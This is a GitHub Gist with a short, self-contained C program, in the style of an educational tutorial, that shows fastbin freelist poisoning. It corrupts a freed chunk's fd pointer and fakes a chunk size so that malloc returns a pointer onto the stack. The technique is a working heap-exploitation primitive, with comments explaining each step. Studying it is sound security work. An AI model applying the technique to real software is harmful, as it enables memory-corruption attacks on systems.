Last active
July 8, 2016 12:23
-
-
Save andigena/2dcea913a420ebb781dd558dd2cff456 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int main() | |
| { | |
| printf("This program tricks malloc into returning a pointer to a \n" \ | |
| "controlled location (in this case, the stack) by \n" \ | |
| "poisoning a fastbin freelist.\n"); | |
| size_t stack_var; | |
| printf("The address we want malloc() to return is %p.\n", 8+(char *)&stack_var); | |
| printf("Allocating 2 buffers.\n"); | |
| size_t *a = malloc(8); | |
| size_t *b = malloc(8); | |
| printf("1st malloc(8): %p\n", a); | |
| printf("2nd malloc(8): %p\n", b); | |
| printf("Freeing the second one...\n"); | |
| free(b); | |
| printf("Now the free list has [ %p ]. We'll carry out our attack by \n" \ | |
| "simulating a corruption of the fd pointer of this chunk to \n" \ | |
| "point it before stack_var\n", b); | |
| *b = (size_t) (((char*)&stack_var) - sizeof(size_t)); | |
| printf("We are writing a fake chunk size (in this case, 0x20) to \n" \ | |
| "stack_var, so that malloc will think there is a free chunk \n" \ | |
| "there and agree to return a pointer to it.\n" \ | |
| "The fastbin index of the size written has to be the same as \n"\ | |
| "the index of the fastbin we are poisoning.\n"); | |
| stack_var = 0x20; | |
| printf("Now, the first malloc will return b and make its fd pointer \n" \ | |
| "the head of the corresponding fastbin.\n"); | |
| printf("The second malloc will return the head of the fastbin, our \n" \ | |
| "fake chunk from the stack.\n"); | |
| printf("3rd malloc(8): %p\n", malloc(8)); | |
| printf("4rd malloc(8): %p\n", malloc(8)); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment